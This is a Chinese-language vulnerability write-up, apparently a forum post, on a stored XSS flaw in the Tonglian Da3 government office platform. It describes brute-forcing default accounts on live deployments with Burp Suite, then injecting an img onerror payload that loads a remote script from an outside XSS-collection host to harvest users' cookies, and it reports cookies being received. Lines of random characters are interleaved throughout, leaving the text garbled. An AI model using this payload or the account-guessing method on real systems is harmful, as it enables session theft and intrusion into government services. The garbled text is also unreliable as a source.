4 j u6 O, `6 ?6 Z6 P2 N; e$ q& i D+ v
: a5 ^7 e2 @$ t6 W, |. B! q/ `- ]
同联Da3协同办公平台后台通用储存型xss漏洞
% O& }/ ] j1 w
" _8 E m4 K3 ^: Y
5 ^% {$ `) W4 s% X1 W* D- _2 ]
平台简介:
) u$ L: k0 i6 A% j" t3 s
. ^& a- f& W+ f8 g# U* O% `$ d4 }
% [) W8 Y5 c6 h$ }! m
; M W9 T# ?" z- b E7 z
) Z" J; |/ `, Y7 _( b
1 p. r2 U i! K9 Q) g/ Q0 x
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. Q, p) R. S* C9 t6 t2 |同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; s! u" X% q5 K4 f' H! c同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
, P5 _, v) a0 [# J6 G
x" a, k8 s. ^! I 6 L B+ @1 B" a% s/ S/ ?
( Y2 p' n! a0 O4 [9 Y5 U& C
5 `; d, V8 H+ t: Z
% G0 ~; D3 ]: Q, a0 p8 W, ^
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
: {6 E" l* U5 ^
* E9 Y7 n$ m$ O! d% }# F8 g : G7 t! K( A2 ]8 d
3 g6 O5 r$ |' ^$ ]/ {/ \" T, j
' w6 C: r' M* J" L; f8 a) a& E 7 x! D" y1 \: R3 H! n
http://1.1.1.1:7197/cap-aco/#(案例2-)% B4 D7 I. y) [' x- T) ?
/ w2 r. l" ^6 T# {( v3 ~0 X * \! [6 `' r# c. ~
http://www.XXOO.com (案例1-官网网站)
5 z$ W3 H+ L& _( \ T$ u
6 s3 r; D( r4 ?" J
5 d8 V9 _! V* Z) ]! W* | 漏洞详情:( p: Q- f! O: j/ D7 G" a. b( |
" b2 p$ s v. F& X# b0 Y, E# B
2 F8 ]: S, h' l4 X6 `# o; }3 m1 f( i" Q
案例一、
1 G- Q) n/ w! f, u Y) }4 o0 M
* f8 i* m8 \6 _# r
# G% R+ F" U( E! M 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% I4 F) d% j% g" o' `
5 y# L/ S2 d( b- A6 J% N; X
Y3 `4 p5 `% `, g9 ?# G 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:' |3 w6 y" t7 c% } M& l8 A2 c
' S" i7 D- R4 f/ \2 j 7 M j' \. g9 `) }- w$ j+ ^: t
) [: z6 G% Z) l1 Q/ L" e/ Z g
; p7 F& c4 U5 q5 n2 U
( J2 o1 Z0 z3 q, F$ N# w
' Y7 C) y$ Z( X4 z* p
p9 [7 s5 a5 ?' x U& k
) i: V9 j; ^- C0 t: K status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: . A+ f. g0 p: p, a/ e' g
# M9 g% ?, y8 b6 T+ ~" x
+ _! a* {2 o; u( [ n" t$ g$ o9 \& V
8 Z6 ]1 b4 d; A! W* S7 W) N
8 i) \1 n8 b+ R$ I
( y3 n/ m( T5 w/ L0 @6 V8 i $ F8 S7 X" A2 |& Z' f
6 T) @4 L" k( k* V
9 O; V( X6 m0 J2 y# P1 o0 r 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 * m" _ d) D: e
5 y5 q+ ~9 Q3 O
: f3 o# U# r8 P; n- q" c( R( Q# \
9 h& u0 W- ?/ p9 V7 ^4 Q: y
$ V) L2 J+ z3 }' e
- w- N0 n) B1 i7 H9 E1 C <img src=x7 D' _& {/ K M3 ?* o$ w' m" A# P
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
% ?) N0 |7 ^. d) J1 O8 r6 w* {1 p
2 s0 X4 N. K) D( m d( ]# M1 N % f) n4 X3 p6 \: q' Y7 k
5 U2 ]9 ^" t; W- a7 [& B
" G9 i: p" G/ Y0 N
. g1 S# P( i4 [, t! \
然后发送,接收cookie如图:
* k, }; P. _& v- ]8 B0 `4 Z, N
n. g8 j. ^8 Q' S0 n+ U1 r% y
- J( w! O( v# M1 P
$ \6 J( J7 [! P8 u R8 Y
$ d# k9 l1 q+ W+ q! I7 Y
& {7 R& p4 D+ {5 I
" b1 H, B0 i; s6 a
x+ O$ i% q. t! o! P& C3 i
& j2 E* E7 ^0 P8 m 5 A* \& a/ S$ U7 Z. R) H3 y1 b3 y1 c
& b* n: M' W, `
9 [! `2 j* r2 V: J) [5 a6 F
* t; `0 q& S) M# e( Y8 L" C
: p, y5 ]4 _* p0 }/ I* B- y% y $ y8 i' i$ w+ A* ^8 s$ z
) W$ S' p# N% r% ? E4 \
1 c; Z& f: w( H* g' m5 U- b
# a/ n+ B+ ]* e' G; u6 L: {0 l9 @1 b8 T
* R; n8 t6 ?/ W3 [
- l# V) S I! [/ }2 h
* h4 L; x. g& P$ H4 q B
; N# x' y9 j, E8 I9 g/ ?0 q1 D4 n
, I: ^& s, A6 R9 ~7 p1 Z6 V8 I . O8 I% a8 a4 b$ ]+ H: k5 j
案例2、 ; |8 f' T9 o. {+ M
' e( a$ N# A0 \4 C0 y {
) |5 O+ J6 C. p' b 前面步骤都一样,下面看效果图: & W$ A, `* D, U1 x
) O' f+ K+ F% G$ Q w' _
$ [2 D5 ]9 K% S; L6 h 1 {+ x+ i0 o7 ?1 h, x7 i X7 C
- B5 H% Z+ y$ z: q: `; Q' G
4 ]8 V# p. Y5 f2 G
1 n( X5 R2 _. E7 [9 Y9 Y
+ |! p3 x- r4 J5 Z % x# u1 X2 f' j& m2 c0 }
3 V8 \, u) K7 c3 @# A# C
. C5 l$ ^9 G7 j
9 i( x$ S2 \2 R" K& A# F ; u/ s- T+ y/ {6 D- f
# U- a0 [' I, [9 K
: {/ ~7 A2 Y$ N' c. D& j
6 P( R6 D% V7 l+ M" O
i) v0 S+ {% L
# `$ @( I$ C9 n- a
8 S: ~6 T+ x7 K) a0 ?/ `' q
@8 l( q% N1 ?6 Y9 _! K ) ?- ?* v0 m, E% h+ d9 c
5 |) R T$ }2 W& X8 r* \1 x0 [# V
7 q7 M9 _9 |4 r% Q
. t2 Z" C0 F/ B' }0 a/ W2 j: i: z ( `$ W0 @6 H' C6 i# r
r; ]# ]; W% I
3 r" w* n0 L3 F7 I
' J5 O7 ^8 o1 g) v
1 a) t& K \' f